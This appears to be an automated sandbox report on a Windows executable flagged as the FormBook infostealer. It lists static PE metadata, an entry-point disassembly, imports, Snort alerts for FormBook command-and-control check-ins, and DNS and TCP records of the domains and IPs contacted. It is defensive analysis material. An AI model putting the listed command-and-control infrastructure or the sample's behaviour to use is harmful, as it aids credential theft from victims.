SSDEEP:	6144:VBlL/kE286EZdSbHptGXIwQhtgaDvepziyGiKR1Y0f0/R2:D6E2864SqBQhtgHpaiuY0c/Y
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

File Icon


Icon Hash:	ccccccd2c0d0f834

Static PE Info

General
Entrypoint:	0x4030fb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FDB84D64D23h
push ebx
call 00007FDB84D67B04h
cmp eax, ebx
je 00007FDB84D64D19h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007FDB84D67A80h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FDB84D64CFDh
push 0000000Dh
call 00007FDB84D67AD8h
push 0000000Bh
call 00007FDB84D67AD1h
mov dword ptr [00423F44h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [00423FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041F4F0h
call dword ptr [0040715Ch]
push 0040915Ch
push 00423740h
call 00007FDB84D67704h
call dword ptr [0040710Ch]
mov ebp, 0042A000h
push eax
push ebp
call 00007FDB84D676F2h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7418	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x14a90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x27c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5aeb	0x5c00	False	0.665123980978	data	6.42230569414	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1196	0x1200	False	0.458984375	data	5.20291736659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1b038	0x600	False	0.432291666667	data	4.0475118296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2d000	0x14a90	0x14c00	False	0.15813253012	data	4.80548061536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2d220	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x3da48	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 50331648, next used block 50331648	English	United States
RT_ICON	0x3fff0	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 134217728, next used block 134217728	English	United States
RT_ICON	0x41098	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x41500	0x100	data	English	United States
RT_DIALOG	0x41600	0x11c	data	English	United States
RT_DIALOG	0x41720	0x60	data	English	United States
RT_GROUP_ICON	0x41780	0x3e	data	English	United States
RT_MANIFEST	0x417c0	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll	SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/27/21-17:50:36.225481	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49762	34.102.136.180	192.168.2.6
10/27/21-17:50:47.258802	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.2.6	35.186.238.101
10/27/21-17:50:47.258802	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.2.6	35.186.238.101
10/27/21-17:50:47.258802	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.2.6	35.186.238.101
10/27/21-17:50:47.373639	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49796	35.186.238.101	192.168.2.6
10/27/21-17:51:02.783266	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49802	80	192.168.2.6	192.0.78.25
10/27/21-17:51:02.783266	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49802	80	192.168.2.6	192.0.78.25
10/27/21-17:51:02.783266	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49802	80	192.168.2.6	192.0.78.25
10/27/21-17:51:18.402850	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49833	23.227.38.74	192.168.2.6
10/27/21-17:51:29.023748	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49835	34.102.136.180	192.168.2.6
10/27/21-17:51:34.243394	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49836	80	192.168.2.6	198.54.117.217
10/27/21-17:51:34.243394	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49836	80	192.168.2.6	198.54.117.217
10/27/21-17:51:34.243394	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49836	80	192.168.2.6	198.54.117.217

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 17:50:36.028481007 CEST	49762	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:50:36.047116995 CEST	80	49762	34.102.136.180	192.168.2.6
Oct 27, 2021 17:50:36.047293901 CEST	49762	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:50:36.047425985 CEST	49762	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:50:36.066009045 CEST	80	49762	34.102.136.180	192.168.2.6
Oct 27, 2021 17:50:36.225481033 CEST	80	49762	34.102.136.180	192.168.2.6
Oct 27, 2021 17:50:36.225509882 CEST	80	49762	34.102.136.180	192.168.2.6
Oct 27, 2021 17:50:36.225745916 CEST	49762	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:50:36.225925922 CEST	49762	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:50:36.244501114 CEST	80	49762	34.102.136.180	192.168.2.6
Oct 27, 2021 17:50:41.400573015 CEST	49790	80	192.168.2.6	50.87.176.30
Oct 27, 2021 17:50:41.558836937 CEST	80	49790	50.87.176.30	192.168.2.6
Oct 27, 2021 17:50:41.559036970 CEST	49790	80	192.168.2.6	50.87.176.30
Oct 27, 2021 17:50:42.019907951 CEST	49790	80	192.168.2.6	50.87.176.30
Oct 27, 2021 17:50:42.181401968 CEST	80	49790	50.87.176.30	192.168.2.6
Oct 27, 2021 17:50:42.196352959 CEST	80	49790	50.87.176.30	192.168.2.6
Oct 27, 2021 17:50:42.196461916 CEST	80	49790	50.87.176.30	192.168.2.6
Oct 27, 2021 17:50:42.196649075 CEST	49790	80	192.168.2.6	50.87.176.30
Oct 27, 2021 17:50:42.196743011 CEST	49790	80	192.168.2.6	50.87.176.30
Oct 27, 2021 17:50:42.363377094 CEST	80	49790	50.87.176.30	192.168.2.6
Oct 27, 2021 17:50:47.241719007 CEST	49796	80	192.168.2.6	35.186.238.101
Oct 27, 2021 17:50:47.258548975 CEST	80	49796	35.186.238.101	192.168.2.6
Oct 27, 2021 17:50:47.258651018 CEST	49796	80	192.168.2.6	35.186.238.101
Oct 27, 2021 17:50:47.258801937 CEST	49796	80	192.168.2.6	35.186.238.101
Oct 27, 2021 17:50:47.275650024 CEST	80	49796	35.186.238.101	192.168.2.6
Oct 27, 2021 17:50:47.373639107 CEST	80	49796	35.186.238.101	192.168.2.6
Oct 27, 2021 17:50:47.373675108 CEST	80	49796	35.186.238.101	192.168.2.6
Oct 27, 2021 17:50:47.373944998 CEST	49796	80	192.168.2.6	35.186.238.101
Oct 27, 2021 17:50:47.373975992 CEST	49796	80	192.168.2.6	35.186.238.101
Oct 27, 2021 17:50:47.392800093 CEST	80	49796	35.186.238.101	192.168.2.6
Oct 27, 2021 17:51:02.766233921 CEST	49802	80	192.168.2.6	192.0.78.25
Oct 27, 2021 17:51:02.782985926 CEST	80	49802	192.0.78.25	192.168.2.6
Oct 27, 2021 17:51:02.783132076 CEST	49802	80	192.168.2.6	192.0.78.25
Oct 27, 2021 17:51:02.783266068 CEST	49802	80	192.168.2.6	192.0.78.25
Oct 27, 2021 17:51:02.800074100 CEST	80	49802	192.0.78.25	192.168.2.6
Oct 27, 2021 17:51:02.800110102 CEST	80	49802	192.0.78.25	192.168.2.6
Oct 27, 2021 17:51:02.800127983 CEST	80	49802	192.0.78.25	192.168.2.6
Oct 27, 2021 17:51:02.800373077 CEST	49802	80	192.168.2.6	192.0.78.25
Oct 27, 2021 17:51:02.800421953 CEST	49802	80	192.168.2.6	192.0.78.25
Oct 27, 2021 17:51:02.817065954 CEST	80	49802	192.0.78.25	192.168.2.6
Oct 27, 2021 17:51:07.856880903 CEST	49815	80	192.168.2.6	104.21.40.182
Oct 27, 2021 17:51:07.873847008 CEST	80	49815	104.21.40.182	192.168.2.6
Oct 27, 2021 17:51:07.874011993 CEST	49815	80	192.168.2.6	104.21.40.182
Oct 27, 2021 17:51:07.874152899 CEST	49815	80	192.168.2.6	104.21.40.182
Oct 27, 2021 17:51:07.890993118 CEST	80	49815	104.21.40.182	192.168.2.6
Oct 27, 2021 17:51:07.902292013 CEST	80	49815	104.21.40.182	192.168.2.6
Oct 27, 2021 17:51:07.902440071 CEST	80	49815	104.21.40.182	192.168.2.6
Oct 27, 2021 17:51:07.903105021 CEST	49815	80	192.168.2.6	104.21.40.182
Oct 27, 2021 17:51:07.903229952 CEST	49815	80	192.168.2.6	104.21.40.182
Oct 27, 2021 17:51:07.920156956 CEST	80	49815	104.21.40.182	192.168.2.6
Oct 27, 2021 17:51:12.947541952 CEST	49829	80	192.168.2.6	104.21.45.211
Oct 27, 2021 17:51:12.964684010 CEST	80	49829	104.21.45.211	192.168.2.6
Oct 27, 2021 17:51:12.964869022 CEST	49829	80	192.168.2.6	104.21.45.211
Oct 27, 2021 17:51:12.964931965 CEST	49829	80	192.168.2.6	104.21.45.211
Oct 27, 2021 17:51:12.981929064 CEST	80	49829	104.21.45.211	192.168.2.6
Oct 27, 2021 17:51:13.296627045 CEST	80	49829	104.21.45.211	192.168.2.6
Oct 27, 2021 17:51:13.296674967 CEST	80	49829	104.21.45.211	192.168.2.6
Oct 27, 2021 17:51:13.296896935 CEST	80	49829	104.21.45.211	192.168.2.6
Oct 27, 2021 17:51:13.296945095 CEST	49829	80	192.168.2.6	104.21.45.211
Oct 27, 2021 17:51:13.297085047 CEST	49829	80	192.168.2.6	104.21.45.211
Oct 27, 2021 17:51:13.297097921 CEST	49829	80	192.168.2.6	104.21.45.211
Oct 27, 2021 17:51:18.343540907 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:18.360551119 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.360698938 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:18.361021996 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:18.378016949 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.402849913 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.402892113 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.402937889 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.402976036 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.403033972 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.403062105 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.403094053 CEST	80	49833	23.227.38.74	192.168.2.6
Oct 27, 2021 17:51:18.403100967 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:18.403274059 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:18.403326988 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:18.403382063 CEST	49833	80	192.168.2.6	23.227.38.74
Oct 27, 2021 17:51:23.473524094 CEST	49834	80	192.168.2.6	142.4.98.67
Oct 27, 2021 17:51:23.665164948 CEST	80	49834	142.4.98.67	192.168.2.6
Oct 27, 2021 17:51:23.665296078 CEST	49834	80	192.168.2.6	142.4.98.67
Oct 27, 2021 17:51:23.665467978 CEST	49834	80	192.168.2.6	142.4.98.67
Oct 27, 2021 17:51:23.857815981 CEST	80	49834	142.4.98.67	192.168.2.6
Oct 27, 2021 17:51:23.857836962 CEST	80	49834	142.4.98.67	192.168.2.6
Oct 27, 2021 17:51:23.857845068 CEST	80	49834	142.4.98.67	192.168.2.6
Oct 27, 2021 17:51:23.858146906 CEST	49834	80	192.168.2.6	142.4.98.67
Oct 27, 2021 17:51:23.858237028 CEST	49834	80	192.168.2.6	142.4.98.67
Oct 27, 2021 17:51:24.049973011 CEST	80	49834	142.4.98.67	192.168.2.6
Oct 27, 2021 17:51:28.889132977 CEST	49835	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:51:28.907830954 CEST	80	49835	34.102.136.180	192.168.2.6
Oct 27, 2021 17:51:28.908083916 CEST	49835	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:51:28.908404112 CEST	49835	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:51:28.927047014 CEST	80	49835	34.102.136.180	192.168.2.6
Oct 27, 2021 17:51:29.023747921 CEST	80	49835	34.102.136.180	192.168.2.6
Oct 27, 2021 17:51:29.023803949 CEST	80	49835	34.102.136.180	192.168.2.6
Oct 27, 2021 17:51:29.024002075 CEST	49835	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:51:29.024163008 CEST	49835	80	192.168.2.6	34.102.136.180
Oct 27, 2021 17:51:29.042787075 CEST	80	49835	34.102.136.180	192.168.2.6
Oct 27, 2021 17:51:34.066029072 CEST	49836	80	192.168.2.6	198.54.117.217
Oct 27, 2021 17:51:34.237325907 CEST	80	49836	198.54.117.217	192.168.2.6
Oct 27, 2021 17:51:34.240775108 CEST	49836	80	192.168.2.6	198.54.117.217

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 17:50:36.000176907 CEST	60342	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:50:36.021222115 CEST	53	60342	8.8.8.8	192.168.2.6
Oct 27, 2021 17:50:41.238684893 CEST	56061	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:50:41.348360062 CEST	53	56061	8.8.8.8	192.168.2.6
Oct 27, 2021 17:50:47.205265045 CEST	53781	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:50:47.240438938 CEST	53	53781	8.8.8.8	192.168.2.6
Oct 27, 2021 17:50:52.420171976 CEST	54064	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:50:52.457309961 CEST	53	54064	8.8.8.8	192.168.2.6
Oct 27, 2021 17:50:57.472321033 CEST	55299	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:50:57.676028967 CEST	53	55299	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:02.743771076 CEST	63745	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:02.764975071 CEST	53	63745	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:07.832869053 CEST	50055	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:07.855567932 CEST	53	50055	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:12.921547890 CEST	61374	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:12.946542025 CEST	53	61374	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:18.308892012 CEST	50339	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:18.341314077 CEST	53	50339	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:23.449269056 CEST	63307	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:23.471781969 CEST	53	63307	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:28.868838072 CEST	49694	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:28.887815952 CEST	53	49694	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:34.040726900 CEST	54982	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:34.064815044 CEST	53	54982	8.8.8.8	192.168.2.6
Oct 27, 2021 17:51:44.740894079 CEST	50010	53	192.168.2.6	8.8.8.8
Oct 27, 2021 17:51:44.793246984 CEST	53	50010	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 27, 2021 17:50:36.000176907 CEST	192.168.2.6	8.8.8.8	0xfc7c	Standard query (0)	www.bobazzing.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:41.238684893 CEST	192.168.2.6	8.8.8.8	0x6a6c	Standard query (0)	www.improvfilmproduction.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:47.205265045 CEST	192.168.2.6	8.8.8.8	0xfd5e	Standard query (0)	www.olympiaapartment.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:52.420171976 CEST	192.168.2.6	8.8.8.8	0x68d0	Standard query (0)	www.chimichael.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:57.472321033 CEST	192.168.2.6	8.8.8.8	0x3cfa	Standard query (0)	www.tucows.website	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:02.743771076 CEST	192.168.2.6	8.8.8.8	0x783e	Standard query (0)	www.malatirada.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:07.832869053 CEST	192.168.2.6	8.8.8.8	0x88ad	Standard query (0)	www.finansresultation.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:12.921547890 CEST	192.168.2.6	8.8.8.8	0xf537	Standard query (0)	www.rxgmarket.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:18.308892012 CEST	192.168.2.6	8.8.8.8	0xeab8	Standard query (0)	www.joystoreworld.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:23.449269056 CEST	192.168.2.6	8.8.8.8	0xfe2f	Standard query (0)	www.bbyyn10.xyz	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:28.868838072 CEST	192.168.2.6	8.8.8.8	0x9ce2	Standard query (0)	www.inkedbreadcompany.com	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.040726900 CEST	192.168.2.6	8.8.8.8	0x941c	Standard query (0)	www.insularrofioa.xyz	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:44.740894079 CEST	192.168.2.6	8.8.8.8	0x6f8	Standard query (0)	www.redeyeops.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 27, 2021 17:50:36.021222115 CEST	8.8.8.8	192.168.2.6	0xfc7c	No error (0)	www.bobazzing.com	bobazzing.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:50:36.021222115 CEST	8.8.8.8	192.168.2.6	0xfc7c	No error (0)	bobazzing.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:41.348360062 CEST	8.8.8.8	192.168.2.6	0x6a6c	No error (0)	www.improvfilmproduction.com	improvfilmproduction.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:50:41.348360062 CEST	8.8.8.8	192.168.2.6	0x6a6c	No error (0)	improvfilmproduction.com		50.87.176.30	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:47.240438938 CEST	8.8.8.8	192.168.2.6	0xfd5e	No error (0)	www.olympiaapartment.com		35.186.238.101	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:52.457309961 CEST	8.8.8.8	192.168.2.6	0x68d0	Name error (3)	www.chimichael.com	none	none	A (IP address)	IN (0x0001)
Oct 27, 2021 17:50:57.676028967 CEST	8.8.8.8	192.168.2.6	0x3cfa	Server failure (2)	www.tucows.website	none	none	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:02.764975071 CEST	8.8.8.8	192.168.2.6	0x783e	No error (0)	www.malatirada.com	malatirada.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:51:02.764975071 CEST	8.8.8.8	192.168.2.6	0x783e	No error (0)	malatirada.com		192.0.78.25	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:02.764975071 CEST	8.8.8.8	192.168.2.6	0x783e	No error (0)	malatirada.com		192.0.78.24	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:07.855567932 CEST	8.8.8.8	192.168.2.6	0x88ad	No error (0)	www.finansresultation.com		104.21.40.182	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:07.855567932 CEST	8.8.8.8	192.168.2.6	0x88ad	No error (0)	www.finansresultation.com		172.67.137.87	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:12.946542025 CEST	8.8.8.8	192.168.2.6	0xf537	No error (0)	www.rxgmarket.com		104.21.45.211	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:12.946542025 CEST	8.8.8.8	192.168.2.6	0xf537	No error (0)	www.rxgmarket.com		172.67.219.47	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:18.341314077 CEST	8.8.8.8	192.168.2.6	0xeab8	No error (0)	www.joystoreworld.com	joy-store-world.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:51:18.341314077 CEST	8.8.8.8	192.168.2.6	0xeab8	No error (0)	joy-store-world.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:51:18.341314077 CEST	8.8.8.8	192.168.2.6	0xeab8	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:23.471781969 CEST	8.8.8.8	192.168.2.6	0xfe2f	No error (0)	www.bbyyn10.xyz	bbyyn10.xyz		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:51:23.471781969 CEST	8.8.8.8	192.168.2.6	0xfe2f	No error (0)	bbyyn10.xyz		142.4.98.67	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:28.887815952 CEST	8.8.8.8	192.168.2.6	0x9ce2	No error (0)	www.inkedbreadcompany.com	inkedbreadcompany.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:51:28.887815952 CEST	8.8.8.8	192.168.2.6	0x9ce2	No error (0)	inkedbreadcompany.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	www.insularrofioa.xyz	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:34.064815044 CEST	8.8.8.8	192.168.2.6	0x941c	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Oct 27, 2021 17:51:44.793246984 CEST	8.8.8.8	192.168.2.6	0x6f8	Name error (3)	www.redeyeops.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.bobazzing.com

www.improvfilmproduction.com

www.olympiaapartment.com

www.malatirada.com

www.finansresultation.com

www.rxgmarket.com

www.joystoreworld.com

www.bbyyn10.xyz

www.inkedbreadcompany.com

www.insularrofioa.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49762	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
